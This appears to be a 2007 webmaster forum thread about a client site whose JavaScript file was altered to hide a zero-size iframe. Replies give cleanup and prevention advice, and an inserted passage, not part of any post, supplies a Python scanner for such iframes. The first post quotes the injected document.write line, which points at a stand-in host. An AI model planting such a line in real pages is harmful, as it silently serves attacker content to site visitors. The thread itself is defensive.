Site Hijacked via iframe addition. How was it done? How to prevent?


unni

5:50 pm on Feb 22, 2007 (gmt 0)

10+ Year Member



In my client's site, somebody added a new line of code like this in a JS file:

document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://example.com/index.htm" frameBorder=0 width=0 scrolling=no height=0 topmargin="0" leftmargin="0"></IFRAME>');

So when a visitor tried to open their site, it was looking for many junk sites.

I removed the entry and now it is working fine...

But how are they getting into the site? What should I do to prevent this?

[edited by: tedster at 7:28 pm (utc) on Feb. 24, 2007]
[edit reason] use example.com [/edit]

webdoctor

7:24 pm on Feb 24, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Have you changed your site passwords?

Is your server up to date with security patches?

If you're on shared hosting, could other users of the server have accessed your site?

Have you checked any log files?

Do you know exactly when this happened - what were the timestamps on the modified files? Have you reported this unauthorised access to your host?

Could your own computer be compromised? Checked for trojans/rootkits recently?

[edited by: tedster at 7:27 pm (utc) on Feb. 24, 2007]
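Following up on the question above about timestamps on the modified files, an added example that is not part of any post in this thread: a Python scan of a copy of the web root for zero-size iframe tags like the one quoted in the first post, reporting each affected file's last-modified time in UTC. The function names, the extension list and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

# Opening <iframe> tags, and a width/height attribute equal to 0 (quoted or not).
IFRAME_TAG = re.compile(r"<iframe\b[^>]*>", re.I)
ZERO_DIM = re.compile(r"\b(?:width|height)\s*=\s*[\"']?0(?![\d.])", re.I)
SRC = re.compile(r"\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
EXTENSIONS = (".js", ".htm", ".html", ".asp", ".aspx", ".php")  # assumed list

def find_hidden_iframes(text):
    """Return the src of each zero-width or zero-height iframe tag in text."""
    hits = []
    for tag in IFRAME_TAG.findall(text):
        if ZERO_DIM.search(tag):
            m = SRC.search(tag)
            hits.append(m.group(1) if m else "")
    return hits

def scan_tree(root):
    """Return (path, UTC mtime, [src, ...]) per file with a hit, oldest change first."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(EXTENSIONS):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                srcs = find_hidden_iframes(fh.read())
            if srcs:
                mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc)
                findings.append((path, mtime.isoformat(timespec="seconds"), srcs))
    return sorted(findings, key=lambda f: f[1])

def demo():
    """Constructed sample tree: the line from the post in one file, a visible iframe in another."""
    injected = ("document.write('<IFRAME marginWidth=0 marginHeight=0 "
                "src=\"http://example.com/index.htm\" frameBorder=0 width=0 "
                "scrolling=no height=0></IFRAME>');\n")
    clean = '<iframe src="/map.html" marginwidth=0 width="600" height="400"></iframe>\n'
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("menu.js", injected), ("contact.html", clean)):
            with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return [(os.path.basename(p), t, s) for p, t, s in scan_tree(root)]

if __name__ == "__main__":
    for name, mtime, srcs in demo():
        print(mtime, name, srcs)
```

A plain string match only finds injections written in the clear; comparing the tree against a known-good backup or a stored hash baseline covers encoded or split variants. The reported modification times give the window to look at in the FTP and web server logs.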

unni

3:36 pm on Feb 25, 2007 (gmt 0)

10+ Year Member



Hi,

Thanks a lot for the reply...

Actually the client has a tech team and they are maintaining it, but they are technically not very sound, so they contacted me to solve this problem...

The site is a Windows dedicated server hosted with Hostway.

I told them to change the password. I think their local machines are not secure... virus scanners are installed, but they were not even aware of spyware... I told them to check with a spyware checker and install ZoneAlarm on every machine.

They removed the added entry on Friday, but today somebody again added the same kind of code in another JS file. It seems like they still have the control. Right?

webdoctor

4:31 pm on Feb 25, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



it seems like they still have the control. right?

If it was my server I'd pull the plug, reinstall from scratch, **PATCH** with all relevant updates (are they patching their server at the moment?), reinstall anti-virus, anti-spyware, **UPDATE** these, then restore data from backups.

You do have backups, right? :-)

unni

4:33 pm on Feb 26, 2007 (gmt 0)

10+ Year Member



Hi,

Thank you for the reply... yes, you are right.

I have a VPS, and with the help of the hosting people I make everything up to date.

But their tech team is not capable of doing everything. They don't know many things. I am working as a consultant to help them only with SEO work.

I told them to change the root password and check for spyware and viruses.

They said they have a full backup...

Matt Probert

6:43 pm on Feb 26, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



First they should look to their own staff. Viruses? Pah! Firewalls? Pah! What use are they when you have a pissed off member of staff or an intruder on the premises?

Talk to some real hackers and find out how *they* do it.

Matt